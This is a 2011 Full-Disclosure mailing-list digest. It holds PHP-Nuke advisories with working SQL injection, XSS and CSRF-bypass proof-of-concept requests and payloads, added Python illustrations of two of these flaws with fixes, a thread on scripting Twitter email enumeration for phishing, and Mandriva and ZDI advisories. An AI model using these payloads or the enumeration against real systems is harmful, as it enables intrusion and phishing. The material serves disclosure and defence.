[Full-disclosure] [Tool Update Announcement] inspathx

2011-03-23 Thread YGN Ethical Hacker Group
Tool Home:
http://code.google.com/p/inspathx/


CHANGELOG
=


Stat: path definitions - 342, path vuln definitions - 140


== Added --xp as alias --x-p

== Refined the param array so it supports any number of dimensions with the
-p option (i.e. -p 1, -p 2, -p 3) - Thanks to Brendan Coles

http://code.google.com/p/inspathx/wiki/OPTION_Param_Array

== Added dotnet 1.x ASPX Full Path Disclosure (tilde character
/~.aspx) - Thanks to Ryan Dewhurst

http://code.google.com/p/inspathx/wiki/ASPNET_FULL_PATH_DISCLOSURE_DOTNET1X





-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?

2011-03-23 Thread huj huj huj
it works surprisingly well considering

2011/3/21 Cal Leeming c...@foxwhisper.co.uk

 Yeah, just noticed that. Soon as I get some spare time, I'll prob have a
 shot at making one. It'd be interesting to know what the success rate /
 latency / concurrency / hours of availability are when using decaptcher (due
 to it being human based), I can't imagine it'd be very good :S


 On Mon, Mar 21, 2011 at 12:32 PM, huj huj huj datski...@gmail.com wrote:

 decaptcher doesn't use ocr though
 they use the indian workforce

 not sure about deathbycaptcha but i think it's the same principle

 2011/3/18 Cal Leeming c...@foxwhisper.co.uk

 Lol, I didn't know about the commercial product 'decaptcher'.

 For shits and giggles, I was going to write a decaptcha myself and
 release as open source, never had time though :S

 One option would be to apply rate limitations to API calls per IP.

 Or, possibly some really heavily obfuscated JS which does key
 calculation with a matching server side algo, and injects the value into the
 form upon submission. This is one of the methods we use on our paid adult
 sites. Unless the person is really determined (and has the patience to
 deobfuscate, then port to their own code), or their bots have spidermonkey
 built in, then it usually fends off most botters.

 To make it harder, we also have a library of about 500 of these (each
 with a different key build algo), which are cycled automatically lol.

 Example:

  $(function() { var
 _0xafd3=[\x74\x20\x3D\x20\x22,,\x6A\x6F\x69\x6E,\x72\x65\x76\x65\x72\x73\x65,\x73\x70\x6C\x69\x74,\x72\x65\x70\x6C\x61\x63\x65,\x22];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\,\/gi,_0xafd3[1])[_0xafd3[5]](/\/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
 var
 _0x5bfa=[\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E,\x74\x79\x70\x65,\x68\x69\x64\x64\x65\x6E,\x61\x74\x74\x72,\x6E\x61\x6D\x65,\x73\x65\x65\x64\x6B\x65\x79,\x76\x61\x6C\x75\x65,\x61\x70\x70\x65\x6E\x64,\x23\x74\x68\x65\x66\x6F\x72\x6D];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
 });

 Again, not perfect, but it's worked well for us :)


 On Fri, Mar 18, 2011 at 3:58 PM, huj huj huj datski...@gmail.com wrote:

 with services like decaptcher and deathbycaptcha this would not be a
 hindrance anyway

 2011/3/15 Cal Leeming c...@foxwhisper.co.uk

 Agreed. These public API methods should have brute force protection at
 the very least. But, because they want instant in-line form validation for
 email address availability, this makes it difficult. In an ideal world,
 they'd have a CAPTCHA on the form, and only validate upon submit with a
 valid captcha.


 On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills 
 cont...@reverseskills.com wrote:

 The problem is to allow unlimited access to that resource, not the
 resource itself.

 2011/3/15 Cal Leeming c...@foxwhisper.co.uk:
  This conceptual flaw exists in most web apps which have a reset
 password by
  email address feature, as most will display an error if the email
 address
  does not exist in their database.
 
  On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills 
 cont...@reverseskills.com
  wrote:
 
  Simple and easy way to get a list of email accounts used on
 Twitter.
  For Phishing campaigns, custom Spam...
 
  Twitter has been notified and I suppose it will someday be fixed if they
  think it should be filtered.
 
  When you create a new Twitter account, the form requests a mailing
  address. Twitter verifies that the email account is not being used, but
  does not check any user token or limit the usage (captcha/block).
 
  https://twitter.com/signup -
  http://twitter.com/users/email_available?email=
 
  We just need to automate it with a simple script , ***Everything
 you
  do will be your responsibility***
  ---
  #!/usr/bin/python
  import sys, json, urllib2, os
 
  f =
  urllib2.urlopen(http://twitter.com/users/email_available?email=
 +sys.argv[1])
  data = json.load(f)
  def valid()
  ..
  Email has already been taken in data [msg] -- reply
  ..
  ---
 
  We just need a list of users to test.. for example :
  http://twitter.com/about/employees  (don't be evil is just an
  example!)
  Parsing the name/nickname and testing the {user}@twitter.com a few
  minutes later we have a list of ~ 400 valid internal email
  *@twitter.com. An attacker could probably.. a brute force attack
  (Google Apps), would send Phishing or try to exploit some browser
 bugs
  or similar. #Aurora #Google. Most of these e-mail are internal, not
  public..
  There are also some that make you think they are used to such
  A-Directory system users :
  ..
  apa...@twitter.com
  r...@twitter.com
  m...@twitter.com
  ..
 
  But, if you download a database Rockyou / Singles.org / Gawker /
  Rootkit.com or just a typical dictionaries and domains will be
 quite
  easy to get hold of a 

[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder

2011-03-23 Thread Emilien Girault
Hello FD!

This is just a reminder that the Call for Papers for Hack In Paris 2011 is 
closing on 30th of March. We've received some very nice submissions so far.

Hack In Paris will take place in Disneyland Paris Conference Center and 
will be split into two parts:
  * June 14-15: Trainings
  * June 16-17: Talks

Please do not hesitate to submit! Your submission should contain the 
following elements:
  * The biography of each author
  * A short description (abstract) of your presentation
  * The summary of your research, including technical information;
in particular novel research with regards to the state of the art
  * An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.


Contact & Social Media
==

Contact:info[at]hackinparis[dot]com
Website:http://www.hackinparis.com/
Twitter:http://twitter.com/hackinparis
Facebook:   http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin:   http://www.linkedin.com/groups?gid=3750882



-- the HIP team




[Full-disclosure] PHP-Nuke 8.x <= chng_uid Blind SQL Injection Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Blind SQL Injection Vulnerability



1. OVERVIEW

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.


2. BACKGROUND

PHP-Nuke is a web portal system or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with a user system. Each user can submit comments to discuss
the articles. Main features include: web-based admin, surveys, top
page, access stats page with counter, user-customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who links to us,
sections manager, customizable HTML blocks, user and author editing, an
integrated banner ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The chng_uid parameter is not properly sanitized upon submission to
/admin.php, which leads to a blind SQL injection vulnerability.
This allows an attacker to inject or manipulate SQL queries in the
back-end database, allowing for the manipulation or disclosure of
arbitrary data.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

= /admin.php

POST /admin.php HTTP/1.1
Referer: http://localhost/admin.php?op=mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

chng_uid=[BLIND_SQL_INJECTION]&op=modifyUser


Tested Payloads:
' or 1=1-- [TRUE]
' or 1=2-- [FALSE]
' or substring(@@version,1,1)=5--  [TRUE if mySQL version is 5.x]
' or substring(@@version,1,1)=4--  [FALSE if mySQL version is 5.x]
' or SLEEP(15)=0-- [sleep for 15 seconds]

Successful response (True) returns the user update form page.
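The boolean-blind oracle behind the tested payloads, beside the parameterised lookup that closes it, as an added example that is not PHP-Nuke's code: the nuke_users table, its columns and the string-built query are assumptions chosen to reproduce the behaviour described above, and SQLite stands in for MySQL (so the @@version payloads are not reproduced).

```python
"""Boolean-blind SQL injection through chng_uid, and the parameterised fix.

Added example, not PHP-Nuke's code. The nuke_users table, its columns and the
string-concatenated query are assumptions chosen to reproduce the behaviour
the advisory describes: a TRUE payload makes the lookup return a user row
(the update form is rendered), a FALSE payload returns nothing. SQLite in
memory stands in for MySQL, so the @@version payloads are not reproduced.
"""
import sqlite3
from typing import Callable, List

# Payloads quoted in the advisory.
PAYLOAD_TRUE = "' or 1=1--"
PAYLOAD_FALSE = "' or 1=2--"


def _db() -> sqlite3.Connection:
    """Constructed sample data standing in for the PHP-Nuke users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE nuke_users (user_id INTEGER, username TEXT)")
    con.execute("INSERT INTO nuke_users VALUES (1, 'admin'), (2, 'editor')")
    return con


def lookup_user_vulnerable(con: sqlite3.Connection, chng_uid: str) -> List[str]:
    """Untrusted chng_uid is spliced into the SQL string (assumed shape of the bug).

    With chng_uid = ' or 1=1-- the statement becomes
        ... WHERE user_id = '' or 1=1--'
    so the quote is closed early, the injected condition decides the result
    and the trailing quote is commented out.
    """
    sql = f"SELECT username FROM nuke_users WHERE user_id = '{chng_uid}'"
    return [row[0] for row in con.execute(sql)]


def lookup_user_fixed(con: sqlite3.Connection, chng_uid: str) -> List[str]:
    """Validate the type (user ids are integers), then bind as a parameter."""
    if not chng_uid.isdigit():
        return []  # reject anything that is not a plain integer
    sql = "SELECT username FROM nuke_users WHERE user_id = ?"
    return [row[0] for row in con.execute(sql, (int(chng_uid),))]


Lookup = Callable[[sqlite3.Connection, str], List[str]]


def renders_update_form(lookup: Lookup, chng_uid: str) -> bool:
    """Models the advisory's oracle: a row found -> user update form is shown."""
    return bool(lookup(_db(), chng_uid))


def is_injectable(lookup: Lookup) -> bool:
    """The TRUE/FALSE pair from the advisory: injectable when the verdicts diverge."""
    return (renders_update_form(lookup, PAYLOAD_TRUE)
            and not renders_update_form(lookup, PAYLOAD_FALSE))


if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_user_vulnerable), ("fixed", lookup_user_fixed)):
        print(f"{name}: injectable={is_injectable(fn)}")
```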


6. SOLUTION

Lock down access to the php-Nuke administration backend.
No patch is available yet.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence regarding security reports.


7. VENDOR

php-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
CWE-89: http://cwe.mitre.org/data/definitions/89.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql injection

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass
Vulnerability



1. OVERVIEW

PHP-Nuke version 8.x and lower are vulnerable to Cross-Site Request
Forgery (CSRF) because their anti-CSRF mechanism (a Referer check) is
broken.


2. BACKGROUND

PHP-Nuke is a web portal system or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with a user system. Each user can submit comments to discuss
the articles. Main features include: web-based admin, surveys, top
page, access stats page with counter, user-customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who links to us,
sections manager, customizable HTML blocks, user and author editing, an
integrated banner ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

PHP-Nuke version 8.x and lower contain a flaw that allows a remote
Cross-Site Request Forgery (CSRF / XSRF) attack. The flaw exists because
the application does not require multiple steps or explicit confirmation
for sensitive transactions in the majority of administrator functions,
such as adding a new user or granting a user administrative privileges.
By using a crafted URL, an attacker may trick the victim into visiting
his web page to take advantage of the trust relationship between the
authenticated victim and the application. Such an attack could trick the
victim into executing arbitrary commands in the context of their session
with the application, without further prompting or verification.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Consider the following code snippet in /mainfile.php of PHP-Nuke:

//

if(!function_exists('stripos')) {
    // PHP4 fallback: emulate stripos with an upper-cased strpos
    function stripos_clone($haystack, $needle, $offset=0) {
        $return = strpos(strtoupper($haystack), strtoupper($needle), $offset);
        if ($return === false) {
            return false;
        } else {
            return true;
        }
    }
} else {
    // But when this is PHP5, we use the original function
    function stripos_clone($haystack, $needle, $offset=0) {
        $return = stripos($haystack, $needle, $offset=0);
        // true whenever $needle occurs anywhere inside $haystack
        if ($return === false) {
            return false;
        } else {
            return true;
        }
    }
}

..

// Posting from other servers is not allowed
// Fix by Quake
// Bug found by PeNdEjO

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_SERVER['HTTP_REFERER'])) {
        // substring test: HTTP_HOST only has to appear somewhere in the Referer
        if (!stripos_clone($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) {
            die('Posting from another server not allowed!');
        }
    } else {
        die($posttags);
    }
}
//

stripos_clone only checks whether the HTTP_HOST value occurs somewhere
inside HTTP_REFERER: it is a case-insensitive substring match, not a
comparison of the Referer's host name against the target domain.
An attacker can bypass it by creating a directory named after the
victim's domain under his own web root, like:

http://attacker.in/victim.com/

From there, he can effectively perform CSRF attacks against PHP-Nuke users.

A short P0C demo video can be seen at
http://yehg.net/lab/pr0js/training/view/misc/PHPNuke_8x_Anti-CSRF-Bypass/
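The substring check quoted above beside a host comparison that rejects the attacker.in/victim.com bypass, as an added example that is not PHP-Nuke's own code; the request cases are constructed and use the host names from this advisory.

```python
"""Referer check as in PHP-Nuke's mainfile.php versus a host comparison.

Added example, not PHP-Nuke's own code. referer_check_substring mirrors the
stripos_clone logic quoted above (case-insensitive substring test of HTTP_HOST
inside HTTP_REFERER); referer_check_host is the stricter replacement that
parses the Referer and compares its host name. The attacker.in / victim.com
names are the ones used in the advisory; the request cases are constructed.
"""
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit


def referer_check_substring(referer: Optional[str], host: str) -> bool:
    """mainfile.php logic: reject only when HTTP_HOST is absent from the Referer."""
    if referer is None:
        return False  # mainfile.php die()s when no Referer is sent
    return host.lower() in referer.lower()


def referer_check_host(referer: Optional[str], host: str) -> bool:
    """Parse the Referer and require its host component to equal HTTP_HOST."""
    if not referer:
        return False
    try:
        parts = urlsplit(referer)
        hostname = parts.hostname  # userinfo and port stripped, lower-cased
    except ValueError:
        return False  # malformed URL (e.g. a bad IPv6 literal)
    if parts.scheme not in ("http", "https") or hostname is None:
        return False
    # HTTP_HOST may carry a port; compare host names only.
    expected = host.split(":", 1)[0].lower()
    return hostname == expected


# Constructed requests: (Referer header, HTTP_HOST) pairs.
CASES: Dict[str, Tuple[Optional[str], str]] = {
    "legitimate": ("http://victim.com/admin.php?op=mod_users", "victim.com"),
    "advisory bypass": ("http://attacker.in/victim.com/", "victim.com"),
    "subdomain trick": ("http://victim.com.attacker.in/", "victim.com"),
    "userinfo trick": ("http://victim.com@attacker.in/", "victim.com"),
    "missing referer": (None, "victim.com"),
}


def compare_checks() -> Dict[str, Tuple[bool, bool]]:
    """For each case, the verdict of both checks as (substring, host)."""
    return {name: (referer_check_substring(r, h), referer_check_host(r, h))
            for name, (r, h) in CASES.items()}


if __name__ == "__main__":
    for name, (weak, strict) in compare_checks().items():
        print(f"{name:16} substring={weak!s:5} host={strict}")
```

A Referer can legitimately be absent or stripped by privacy tooling, so even the host comparison supplements a per-session anti-CSRF token rather than replacing it.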


6. SOLUTION

Not available.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence regarding security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke 

[Full-disclosure] [ MDVSA-2011:052 ] php

2011-03-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:052
 http://www.mandriva.com/security/
 ___

 Package : php
 Date: March 23, 2011
 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in php:
 
 The _zip_name_locate function in zip_name_locate.c in the Zip extension
 in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED
 argument, which might allow context-dependent attackers to cause
 a denial of service (application crash) via an empty ZIP archive
 that is processed with a (1) locateName or (2) statName operation
 (CVE-2011-0421).
 
 exif.c in the Exif extension in PHP before 5.3.6 on 64-bit platforms
 performs an incorrect cast, which allows remote attackers to cause a
 denial of service (application crash) via an image with a crafted Image
 File Directory (IFD) that triggers a buffer over-read (CVE-2011-0708).
 
 Integer overflow in ext/shmop/shmop.c in PHP before 5.3.6 allows
 context-dependent attackers to cause a denial of service (crash)
 and possibly read sensitive memory via a large third argument to the
 shmop_read function (CVE-2011-1092).
 
 Multiple format string vulnerabilities in phar_object.c in the phar
 extension in PHP 5.3.5 and earlier allow context-dependent attackers
 to obtain sensitive information from process memory, cause a denial of
 service (memory corruption), or possibly execute arbitrary code via
 format string specifiers in an argument to a class method, leading
 to an incorrect zend_throw_exception_ex call (CVE-2011-1153).
 
 Buffer overflow in the strval function in PHP before 5.3.6, when
 the precision configuration option has a large value, might allow
 context-dependent attackers to cause a denial of service (application
 crash) via a small numerical value in the argument (CVE-2011-1464).
 
 Integer overflow in the SdnToJulian function in the Calendar extension
 in PHP before 5.3.6 allows context-dependent attackers to cause a
 denial of service (application crash) via a large integer in the
 first argument to the cal_from_jd function (CVE-2011-1466).
 
 Unspecified vulnerability in the NumberFormatter::setSymbol (aka
 numfmt_set_symbol) function in the Intl extension in PHP before 5.3.6
 allows context-dependent attackers to cause a denial of service
 (application crash) via an invalid argument, a related issue to
 CVE-2010-4409 (CVE-2011-1467).
 
 Unspecified vulnerability in the Streams component in PHP before
 5.3.6 allows context-dependent attackers to cause a denial of service
 (application crash) by accessing an ftp:// URL during use of an HTTP
 proxy with the FTP wrapper (CVE-2011-1469).
 
 The Zip extension in PHP before 5.3.6 allows context-dependent
 attackers to cause a denial of service (application crash)
 via a ziparchive stream that is not properly handled by the
 stream_get_contents function (CVE-2011-1470).
 
 Integer signedness error in zip_stream.c in the Zip extension in PHP
 before 5.3.6 allows context-dependent attackers to cause a denial of
 service (CPU consumption) via a malformed archive file that triggers
 errors in zip_fread function calls (CVE-2011-1471).
 
 The previous fix for #43486 got lost along the line and is now being
 fixed again.
 
 Note: the php-phar (CVE-2011-1153) and php-intl (CVE-2011-1467)
 packages were shipped with Enterprise Server 5 only and are also being
 fixed with this advisory.
 
 Additionally sqlite3 was upgraded to 3.7.3 for Corporate Server 4 which
 has numerous bug fixes and enhancements over the previous version.
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0421
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0708
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1092
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1153
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1466
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1467
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1469
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1471
 https://qa.mandriva.com/43486
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 2aad1219df9af834bfddc38736c71f5c  

[Full-disclosure] PHP-Nuke 8.x <= Cross Site Scripting Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x <= Cross Site Scripting Vulnerability



1. OVERVIEW

PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scripting.


2. BACKGROUND

PHP-Nuke is a web portal system or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with a user system. Each user can submit comments to discuss
the articles. Main features include: web-based admin, surveys, top
page, access stats page with counter, user-customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who links to us,
sections manager, customizable HTML blocks, user and author editing, an
integrated banner ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The sender_name and sender_email parameters are not properly
sanitized upon submission to /modules.php?name=Feedback, which
allows an attacker to conduct a Cross Site Scripting attack. This may
allow an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Parameter: sender_name

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3E&sender_email=&message=&opi=ds&submit=Send
[/REQUEST]

-
Parameter: sender_email

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_email=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3E&sender_name=&message=&opi=ds&submit=Send
[/REQUEST]


6. SOLUTION

Not available.
Use of this product is NOT recommended because of the long lack of
updates and the vendor's negligence regarding security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_scripting
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
php-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
CWE-79: http://cwe.mitre.org/data/definitions/79.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1,  xss

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] [ MDVSA-2011:053 ] php

2011-03-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:053
 http://www.mandriva.com/security/
 ___

 Package : php
 Date: March 23, 2011
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in php:
 
 The _zip_name_locate function in zip_name_locate.c in the Zip extension
 in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED
 argument, which might allow context-dependent attackers to cause
 a denial of service (application crash) via an empty ZIP archive
 that is processed with a (1) locateName or (2) statName operation
 (CVE-2011-0421).
 
 exif.c in the Exif extension in PHP before 5.3.6 on 64-bit platforms
 performs an incorrect cast, which allows remote attackers to cause a
 denial of service (application crash) via an image with a crafted Image
 File Directory (IFD) that triggers a buffer over-read (CVE-2011-0708).
 
 Integer overflow in ext/shmop/shmop.c in PHP before 5.3.6 allows
 context-dependent attackers to cause a denial of service (crash)
 and possibly read sensitive memory via a large third argument to the
 shmop_read function (CVE-2011-1092).
 
 Multiple format string vulnerabilities in phar_object.c in the phar
 extension in PHP 5.3.5 and earlier allow context-dependent attackers
 to obtain sensitive information from process memory, cause a denial of
 service (memory corruption), or possibly execute arbitrary code via
 format string specifiers in an argument to a class method, leading
 to an incorrect zend_throw_exception_ex call (CVE-2011-1153).
 
 Buffer overflow in the strval function in PHP before 5.3.6, when
 the precision configuration option has a large value, might allow
 context-dependent attackers to cause a denial of service (application
 crash) via a small numerical value in the argument (CVE-2011-1464).
 
 Integer overflow in the SdnToJulian function in the Calendar extension
 in PHP before 5.3.6 allows context-dependent attackers to cause a
 denial of service (application crash) via a large integer in the
 first argument to the cal_from_jd function (CVE-2011-1466).
 
 Unspecified vulnerability in the NumberFormatter::setSymbol (aka
 numfmt_set_symbol) function in the Intl extension in PHP before 5.3.6
 allows context-dependent attackers to cause a denial of service
 (application crash) via an invalid argument, a related issue to
 CVE-2010-4409 (CVE-2011-1467).
 
 Multiple memory leaks in the OpenSSL extension in PHP before 5.3.6
 might allow remote attackers to cause a denial of service (memory
 consumption) via (1) plaintext data to the openssl_encrypt function or
 (2) ciphertext data to the openssl_decrypt function (CVE-2011-1468).
 
 Unspecified vulnerability in the Streams component in PHP before
 5.3.6 allows context-dependent attackers to cause a denial of service
 (application crash) by accessing an ftp:// URL during use of an HTTP
 proxy with the FTP wrapper (CVE-2011-1469).
 
 The Zip extension in PHP before 5.3.6 allows context-dependent
 attackers to cause a denial of service (application crash)
 via a ziparchive stream that is not properly handled by the
 stream_get_contents function (CVE-2011-1470).
 
 Integer signedness error in zip_stream.c in the Zip extension in PHP
 before 5.3.6 allows context-dependent attackers to cause a denial of
 service (CPU consumption) via a malformed archive file that triggers
 errors in zip_fread function calls (CVE-2011-1471).
 
 The updated php packages have been upgraded to 5.3.6 which is not
 vulnerable to these issues.
 
 Additionally, some of the PECL extensions have been upgraded and/or
 rebuilt for the new php version.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0421
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0708
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1092
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1153
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1466
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1467
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1468
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1469
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1471
 ___

 Updated Packages:

 Mandriva Linux 2010.0:
 360c127934a5787c7e6d8a29f16144b9  
2010.0/i586/apache-mod_php-5.3.6-0.1mdv2010.0.i586.rpm
 35910b8aefb974a002158baae205aa7e  
2010.0/i586/libphp5_common5-5.3.6-0.1mdv2010.0.i586.rpm
 

[Full-disclosure] ZDI-11-111: (0Day) Hewlett-Packard Virtual SAN Appliance hydra.exe Login Request Remote Code Execution Vulnerability

2011-03-23 Thread ZDI Disclosures
ZDI-11-111: (0Day) Hewlett-Packard Virtual SAN Appliance hydra.exe Login 
Request Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-111

March 23, 2011

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard Virtual SAN Appliance

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett-Packard Virtual SAN appliance.
Authentication is not required to exploit this vulnerability. 

The flaw exists within the hydra.exe component which listens by default
on port 13838. When parsing a login request the Hydra daemon will call
sscanf() using fixed-length stack buffers and no length checks. A remote
attacker can exploit this vulnerability to execute arbitrary code under
the context of the SYSTEM service.

-- Vendor Response:
March 23, 2011 - This vulnerability is being disclosed publicly without
a patch in accordance with the ZDI 180 day deadline.

-- Mitigations:
This vulnerability could be mitigated by administrators by restricting
communication with the hydra agent to known client IP addresses.

-- Disclosure Timeline:
2010-09-24 - Vulnerability reported to vendor
2011-03-23 - Public release of advisory

-- Credit:
This vulnerability was discovered by:
* Nicolas Gregoire of Agarri (www.agarri.fr)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
